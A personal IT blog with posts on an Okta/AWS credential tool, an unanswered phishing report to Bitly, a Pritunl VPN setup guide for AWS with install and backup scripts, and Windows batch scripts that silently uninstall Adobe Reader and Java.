Project release: AWS Okta Keyman

Available today: AWS Okta Keyman. This package is a fork of earlier work by Nextdoor, Inc.; it adds Duo Auth support, and other features are already on the roadmap.

This package lets a user who already uses Okta with AWS authenticate to Okta, use that session to authenticate to AWS, and pull down temporary credentials (an access key and secret key) for the AWS APIs. Users therefore get API access without long-lived keys stored on their dev systems. That protects the AWS resources: the keys are valid for at most an hour, so an unintended disclosure or leak leaves only a short window of risk before they expire. It also enforces continual key rotation, much like the on-box experience of EC2 instances that use IAM Roles for EC2.

If you use Okta to log in to AWS, give it a try today: pip install aws-okta-keyman

The source is available under the Apache 2.0 license.

For more information: https://github.com/nathan-v/aws_okta_keyman

It’s time to say goodbye to Bit.ly

Don’t get this backwards; they’re still very much alive… but they are dead to me. Today marked the second time in the last few months I’ve emailed them to notify them that their service was being utilized to facilitate a phishing campaign. Both times now they have simply ignored me.

No response.

Nothing.

I notified them on April 5th of one of these links. They never replied. That link still exists today though my emails to the hosting provider and the site owner seemed to have landed on someone’s listening ears as their compromised Drupal install was fixed and updated soon after. The phishing link just takes you to the previously-compromised site’s homepage now but it should have been taken down by Bitly.

Today? Well I got a nice auto-emailer this time at least saying thanks for the email but the link continues to get clicked on by unsuspecting users. At the time of writing more than 2,200 clicks have been registered.

They have nothing listed on their knowledge base about phishing though spam is mentioned. Their support auto-emailer lets you happily know it may take two business days for them to get back to you. More than enough time for a phisher to gather tens of thousands of people’s information.

I’ve once again emailed the hosting provider and the domain registrar. No responses from anyone yet but I happen to use the same registrar for a couple of my domains so I’m hoping to get… something… back.

The phishing site is of lower quality this time, at least. Hopefully some people notice the ‘Finish’ button is instead labeled ‘Finnish’ but if they actually clicked on some random Bitly link sent to them via SMS… chances are low.

Phishing site

Hopefully the hosting provider takes notice.

To my original point: it’s time to let Bitly die on the vine if they can’t even acknowledge their part in the theft of users’ personal information and do something to thwart the thieves taking advantage of their service. They have been given the opportunity to stop a phisher in their tracks and they chose to look the other way.

Just stop trusting Bitly links. If the RickRolls weren’t enough to convince you, this should be.

Bitfail logo

Update 23 June 2016: The only company involved that has responded was the registrar who did so not long after the hosted site stopped responding. Better than silence.

Pritunl for AWS VPC with Replicated Servers

After doing some research on VPN alternatives to using AWS’ provided VPN options I recently settled on doing a test with the software Pritunl. The software is an open-source GUI frontend for OpenVPN. It does a nice job of simplifying the management and configuration of the VPN endpoints and, when you pay for Pritunl Enterprise, also includes some other nifty features.

There are several features that are unlocked by paying for the Enterprise license and one of those is Replicated Servers. Replicated Servers gives you a unified backend database (using MongoDB) that stores configuration and user information. This lets you run multiple Pritunl hosts for your users to provide extra endpoints in the event of a failure.

The setup is pretty simple, but since I didn’t see any articles or posts covering it I thought it would be good to put something together. In this case I’ll be using AWS, but the principles are the same no matter where the hosts are.

For this example we’ll be using Ubuntu Server to keep things more provider-agnostic. It’s possible to use Arch Linux or Amazon Linux instead if you prefer that.

First, of course, you’ll need to be logged into the AWS console or have the CLI set up on your machine.

Go ahead and allocate 3 Elastic IPs in your VPC. We’ll use two for the internet-facing hosts and the last will be a way to provide a static IP for the database host. You can use other methods to make the IP stick but this one is the simplest and it allows the host to update from the web.

Set up two EC2 security groups:

  • VPN:
    • TCP/22 open to your IP for SSH
    • TCP/9700 open to your IP for access to the web UI (you may want to open this to /0 later)
    • UDP 25000 open to 0.0.0.0/0 for the VPN tunnel
  • VPN DB:
    • TCP/22 open to your IP for SSH (you may want to remove this or limit it later on)
    • TCP 27017 open to the VPN SG for the database connection

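The two security groups above, expressed as boto3-style ingress rules with a pre-flight check that only the OpenVPN UDP port is world-reachable (an added example, not from the post; the group names, the admin CIDR and the region default are assumptions, and the real AWS calls only happen when it is run as a script with boto3 installed):

```python
import sys

VPN_UDP_PORT = 25000   # OpenVPN tunnel port chosen in the post
WEB_UI_PORT = 9700     # Pritunl web UI
MONGO_PORT = 27017     # MongoDB, reachable only from the VPN group
ANYWHERE = "0.0.0.0/0"


def cidr_rule(proto, port, cidr):
    """One ingress rule for a single port from a CIDR block."""
    return {"IpProtocol": proto, "FromPort": port, "ToPort": port,
            "IpRanges": [{"CidrIp": cidr}]}


def sg_rule(proto, port, source_sg_id):
    """One ingress rule for a single port from another security group."""
    return {"IpProtocol": proto, "FromPort": port, "ToPort": port,
            "UserIdGroupPairs": [{"GroupId": source_sg_id}]}


def vpn_sg_rules(admin_cidr):
    """'VPN' group: SSH and the web UI from the admin IP only,
    the OpenVPN UDP tunnel from anywhere."""
    return [cidr_rule("tcp", 22, admin_cidr),
            cidr_rule("tcp", WEB_UI_PORT, admin_cidr),
            cidr_rule("udp", VPN_UDP_PORT, ANYWHERE)]


def vpn_db_sg_rules(admin_cidr, vpn_sg_id):
    """'VPN DB' group: SSH from the admin IP, MongoDB only from members
    of the VPN group (a group reference, never a CIDR)."""
    return [cidr_rule("tcp", 22, admin_cidr),
            sg_rule("tcp", MONGO_PORT, vpn_sg_id)]


def world_open_ports(rules):
    """Return the set of (proto, port) pairs reachable from 0.0.0.0/0.
    Pre-flight check: the VPN group should yield exactly {('udp', 25000)}
    and the DB group should yield an empty set."""
    exposed = set()
    for rule in rules:
        for rng in rule.get("IpRanges", []):
            if rng["CidrIp"] == ANYWHERE:
                for port in range(rule["FromPort"], rule["ToPort"] + 1):
                    exposed.add((rule["IpProtocol"], port))
    return exposed


def create_groups(vpc_id, admin_cidr, region="us-east-1"):
    """Create both groups with boto3 (real AWS calls; needs credentials)."""
    import boto3  # imported here so the rule builders stay usable offline
    ec2 = boto3.client("ec2", region_name=region)
    vpn = ec2.create_security_group(GroupName="pritunl-vpn",
                                    Description="Pritunl VPN endpoints",
                                    VpcId=vpc_id)["GroupId"]
    db = ec2.create_security_group(GroupName="pritunl-vpn-db",
                                   Description="Pritunl MongoDB host",
                                   VpcId=vpc_id)["GroupId"]
    vpn_rules = vpn_sg_rules(admin_cidr)
    db_rules = vpn_db_sg_rules(admin_cidr, vpn)
    # refuse to apply rules that expose more than the tunnel port
    assert world_open_ports(vpn_rules) == {("udp", VPN_UDP_PORT)}
    assert not world_open_ports(db_rules)
    ec2.authorize_security_group_ingress(GroupId=vpn, IpPermissions=vpn_rules)
    ec2.authorize_security_group_ingress(GroupId=db, IpPermissions=db_rules)
    return vpn, db


if __name__ == "__main__":
    # usage: python pritunl_sgs.py <vpc-id> <your-ip>/32   (values are yours)
    print(create_groups(sys.argv[1], sys.argv[2]))
```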
We’ll start with the database host first. Go ahead and start an instance of the size that suits your deployment and use Ubuntu Server 14.04. You’ll probably want to put this in your private subnet if you have one. Make sure you have set the security group up as above. Assign one of the EIPs to the host and go ahead and connect over SSH.

Once logged in you’ll want to execute the following commands:

# Update the host
sudo apt-get update
sudo apt-get -y upgrade

# Add the MongoDB repo key to apt
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 7F0CEB10

# Add MongoDB repo to apt sources
echo "deb http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-3.0.list

# Update apt and install MongoDB
sudo apt-get update
sudo apt-get install -y mongodb-org

# Tell MongoDB to listen for external connections by commenting out the
# line "bind_ip = 127.0.0.1" (the VPN DB security group is what limits
# who can reach port 27017 once this is done)
sudo sed -i 's/^bind_ip = 127.0.0.1/#bind_ip = 127.0.0.1/' /etc/mongod.conf
# Start MongoDB
sudo service mongod start

Woohoo! Our database lives!

Next let’s start the Pritunl VPN hosts. You can start as many or as few as you need and with the size that suits best but again use Ubuntu Server 14.04. These should be in your public subnet. Assign EIPs for each. Then go ahead and connect over SSH.

For each machine do the following:

# Update the host
sudo apt-get update
sudo apt-get -y upgrade

# Add the Pritunl apt key
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com --recv CF8E292A

# Add the Pritunl repo to apt
echo "deb http://repo.pritunl.com/stable/apt trusty main" | sudo tee /etc/apt/sources.list.d/pritunl.list

# Update apt and install Pritunl
sudo apt-get update
sudo apt-get -y install pritunl

# Start Pritunl
sudo service pritunl start

You’ll then need to open your browser to https://<host IP>:9700/ and fill in the MongoDB host information. On the first host you’ll then log in with the default user/password of pritunl/pritunl, change the login, and then enter your Enterprise license key. After that log in to each of the rest of the hosts and enter the MongoDB host information.

Now with that finished we have replicated Pritunl configured. Not including bandwidth or reserved-instance discounts it runs about $90/month for this setup, using two t2.micro instances for the VPN endpoints and a t2.small for the MongoDB host. So far in testing I’ve successfully pushed more than 25 Mbps through a connection on the t2.micro host without any fuss.

The next step involves a little planning. Consider what parts of the network different user groups will need to access. If everyone will have access to everything in your VPC this is easy but otherwise you’ll need to plan for which subnets people need access to. This could mean splitting things up by teams or maybe just production access accounts versus nonproduction access.

Go to the Users tab. You’ll want to create one or more Organizations for users to be grouped into. For each different group that needs access to different subnets you’ll want different organizations. After that go ahead and put the users in their correct organizations. With Pritunl Enterprise you can use SSO to handle part of this but that’s something to cover another time.

At this point you can set up your first Pritunl server. In the web interface on one of the hosts go to the Servers tab. There click on the Add Server button and fill out the form. For the UDP port enter 25000 (the port we added to the EC2 SG earlier). Make sure to click on the Advanced button and enter the number of replicated hosts you’ll use for the connections. You’ll also want to change the server mode to Local Traffic Only and specify which subnets the VPN server should give access to. Once satisfied with the config click Add and then watch the UI. The server will generate its DH parameters in the background. If you’ve selected parameters more complex than the default 1536 it’s going to take a little while to finish. I’d recommend you use at least 2048.

You can start making additional servers for each set of subnets people might need to access. Associate the organizations to each based on their needs.

Once that’s all done and all of the DH parameters have been generated you can start the servers. After they’ve started you can download the credentials for your user and confirm that the VPN responds as it should.

You should now be all set; distribute the credentials needed to all of your users and enjoy.

Update:
Below is the script I run on the Mongo box to back it up each night and drop the results into S3.

#!/bin/sh
set -e

# Placeholder: the original post omitted the bucket name; set it to yours.
BUCKET="your-bucket-name"
TODAY=$(date +%Y-%m-%d)

echo "Backing up MongoDB database for $TODAY..."
mongodump --out "/backup/pritunldb-$TODAY"
echo "Backup complete. Compressing output..."
cd /backup/
tar -zcf "pritunldb-$TODAY.tar.gz" "pritunldb-$TODAY/"
echo "Compression complete. Copying to S3..."
# The dump holds the whole Pritunl config and user database, so ask S3
# for server-side encryption at rest on the way in.
/usr/local/bin/aws s3 cp "pritunldb-$TODAY.tar.gz" "s3://$BUCKET/pritunl/db/" --sse AES256
echo "S3 copy complete. Cleaning up..."
rm -rf "pritunldb-$TODAY/"
# Drop local archives older than 21 days
find /backup/ -maxdepth 1 -name 'pritunldb-*.tar.gz' -mtime +21 -exec rm {} \;
echo "Cleanup complete. Backup complete."

Batch Script: Purge Reader

Going along with the batch theme, this one is designed to take Reader / Acrobat off the target system. If I missed any GUIDs or you have any suggestions, please feel free to email or comment here.

Thanks!
-Nathan V

@echo off
GOTO START
#################################################
# Purge Reader Script by:                       #
#      Nathan V                                 #
#      Cyber Security Analyst                   #
#      http://nathanv.com                       #
#                                               #
# For assistance and new versions contact       #
#      nathan.v@gmail.com                       #
#                                               #
# This file updated:                30 SEP 2012 #
#                                               #
# Purge Reader (c) 2012 Nathan V License: GPLv3 #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################

:START
msiexec /x {AC76BA86-7AD7-1033-7B44-000000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A00000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-0000-0000-6028747ADE01} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000603} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000604} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000605} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000606} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70500000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70700000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70800000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70900000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A71000000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-800000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-800000000004} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A80000000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81100000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81200000003} /qn /log c:\temp\purgereader.log
msiexec /x {6846389C-BAC0-4374-808E-B120F86AF5D7} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81300000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A82000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A83000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-900000000004} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A92000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A93000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A94000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-A00000000004} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-AA0000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-AA1000000001} /qn /log c:\temp\purgereader.log

Batch Script: Purge Java

Due to the recent disclosures and most especially yesterday’s announcement of Java vulnerabilities I thought I should release my Java Purge Script.  You can read more information about the most recent events in the links at the bottom in the More Information section.

This script is part of a suite I’ll be releasing soon that I use for pushing patches and batches to remote computers that allows you to stage the files in advance (first runtime) and then execute them during your patch window using psexec (second runtime) to give you better control on when and how the patches are executed.  No ETA on that one yet as it’s a living file still.

You can run this script locally or push it with a policy to run on target systems. It should remove all versions of the JRE and JDK from the target system.

As always, if you have any suggestions for improvements, please let me know.

@echo off
GOTO START
#################################################
# Purge Java Script by:                         #
#      Nathan V                                 #
#      Cyber Security Analyst                   #
#      http://nathanv.com                       #
#                                               #
# For assistance and new versions contact       #
#      nathan.v@gmail.com                       #
#                                               #
# This file updated:                26 SEP 2012 #
#                                               #
# Purge Java (c) 2012 Nathan V  License: GPLv3  #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################

:START
net stop JavaQuickStarterService
taskkill /f /im jqs.exe /im jucheck.exe /im javaw.exe

msiexec /x {1111706F-666A-4037-7777-202328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1111706F-666A-4037-7777-203328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1111706F-666A-4037-7777-210328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1111706F-666A-4037-7777-211328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1666FA7C-CB5F-11D6-A78C-00B0D079AF64} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {2222706F-666A-4037-7777-202328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {2222706F-666A-4037-7777-203328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83214204FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215002FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215004FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215005FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215006FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215007FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215010FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215011FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215012FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216000FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216010FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216011FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216012FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216013FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216014FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216015FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216016F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216016FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216017F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216017FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216018FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216019F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216019FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216020F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216020FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216022F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216022FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216023F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216023FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216024F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216024FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216025F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216025FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216026F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216026FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216027F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216027FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216028F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216028FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216029FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216030FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216031FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216032FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216033FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216034FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216035FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216050FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217000FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217001FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217002FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217003FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217004FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217005FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217006FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217007FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150070} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150080} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150090} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150100} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150110} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150120} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150130} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150140} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150210} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150220} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160031} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160070} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160080} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160090} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0150060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160200} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160210} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160220} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160230} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160240} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160250} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160260} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160270} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160280} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160290} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160310} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160320} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160330} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {4A03706F-666A-4037-7777-5F2748764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
